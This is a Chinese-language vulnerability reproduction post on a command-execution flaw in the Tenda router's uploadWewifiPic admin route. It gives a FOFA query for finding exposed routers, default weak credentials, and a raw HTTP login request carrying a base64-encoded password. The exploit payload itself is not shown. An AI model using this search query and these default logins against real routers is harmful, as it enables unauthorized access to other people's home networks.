Tenda 路由器 uploadWewifiPic后台RCE漏洞复现

0x01 产品简介

 腾达路由器是一款高效实用的路由器,致力于为家庭用户提供舒适、便捷、自然的智慧家庭体验。简单便捷的部署在家庭中,彻底解决家庭用户的网络接入问题。

0x02 漏洞概述

 腾达路由器后台 uploadWewifiPic 路由存在命令执行漏洞,攻击者可利用漏洞执行任意命令获取服务器权限。

0x03 复现环境

FOFA:app="Tenda-路由器"

Tenda 路由器 uploadWewifiPic后台RCE漏洞复现_第1张图片0x04 漏洞复现 

默认弱口令登录

账号:admin  密码:guest、admin等(base64编码)也可以登录页面直接尝试

POST /login/Auth HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 34

username=admin&password=Z3Vlc3Q%3D

Tenda 路由器 uploadWewifiPic后台RCE漏洞复现_第2张图片

 
 

你可能感兴趣的:(漏洞复现,智能路由器,web安全)